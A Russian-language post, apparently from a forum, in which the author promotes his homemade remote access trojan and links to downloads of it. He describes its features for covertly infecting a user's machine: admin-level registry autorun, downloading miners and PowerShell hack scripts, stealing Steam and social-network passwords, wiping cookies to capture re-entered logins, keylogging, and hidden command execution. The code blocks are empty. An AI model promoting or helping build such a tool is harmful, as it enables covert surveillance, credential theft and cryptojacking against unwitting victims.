Этот гайд завершает мою эпопею с написанием собственного RMS (RAT). Легкий и маленький дистрибутив имеет ряд приятных функций, которые помогут вам угнать пароли от стима, одноклассников и вконтакта, а так же скачивать ПО и запускать скрипты PowerShell. Чем так хорош PowerShell? Набери в гугле это словосочетание "powershell hack" и офигей от моря различных скриптов которые позволят расширить функционал моей тулзы до небес)))

Итак, от предисловия к делу. Основные команды управления будут показаны в видео, а так же будет показан процесс работы программы. Вы так же её можете скачать по адресу rar архив и отредактировать конфиг бота под себя - https://yadi.sk/d/4PC45dbj3NLYav
Или скомпилировать код с помощь CX_FREEZE самостоятельно для любой винды, начиная с висты.
Скоро код по-человечески выложу на гитхаб (уже) [https://github.com/enot-pogromist/simple_rat_bot] , там же постепенно будут появляться сниппеты PowerShell'а.
Видео - Гайд:

ВНИМАНИЕ! ТЕПЕРЬ РАЗАРХИВИРУЕМ и ЗАПУСКАЕМ ИЗ ПАПКИ С:\USERS\; этот костыль уберу, можно будет скидывать в любую папку и запускать из неё же.

Code

ВНИМАНИЕ! ТЕПЕРЬ РАЗАРХИВИРУЕМ и ЗАПУСКАЕМ ИЗ ПАПКИ С:\USERS\; этот костыль уберу, можно будет скидывать в любую папку и запускать из неё же.

Основной Гайд:



Итак, при запуске sfx архива мы получаем программу, запущенную от имени администратора, для того что бы изменить два параметра реестра - на автозапуск и получение разрешения на запуск powershell скриптов, которые мы будем качать потом из интернета.



В коде функция старт выглядит именно так. Она и добавляет эти два ключа. Вызывается эта функция командой:



Далее идет стандартное приветствие, когда наш бот запустится на машине пользователя. Так мы поймем, что ключи прописаны
и все работает штатно. Следующей командой мы можем, например, докачать какой нибудь майнер:



Нам нужно будет набрать /wget и адрес файла в интернете. Так же можно скачивать любые другие программы и скрипты.
А следующей функцией у нас будет удаление куки всех браузеров и стима:



Она позволит стереть регистрационные данные пользователя, заставив его ввести повторно все пароли, от всех акков.
Но пока я остановился на пяти вариантах кукис, для Хрома, ЯндексБро, Стима, Лисицы и Оперы:



Шлите мне местоположения куки других игр/приложений/всей ерунды для того что бы программа стала удобнее. Не хочется
лазить и тереть ручками всё самому.

А вот две следующих команды позволят нам начать слежку за клавиатурой и загрузку ***** когда мы захотим.



Эта команда запусит Кейлоггер.



А эта позволит нам скачать ****.... А теперь я расскажу еще об трех командах которые вам пригодятся, например, запуск
программ с любыми параметрами, причем скрытый:



Это команда /cmd, а за ней будут следовать любые параметры, какие вам заблагорассудится, отчет о том как работает
присылается тут же и вы можете просмотреть все ****.



А так же есть стандартные программы перемещения по дирректориям - ls и cd соответственно, их функционал соответствует
BusyBox, ничего особенного вообщем:



В результате работы над этим скриптом пострадала 1 (компьютерная) мышка, 1 банка кофе, 1 блок сигарет, 1 мозг, моё
самоуважение.

PS. Вебка работает только тогда - когда программа - скрипт, как компилируется - падает и не поднимается. За сим эту хрень
выбрасываю в угоду скорости и надежности.

ЗЫ: Подпишись на Ютьюб, тебе жалко шо ле?

#МояСтатья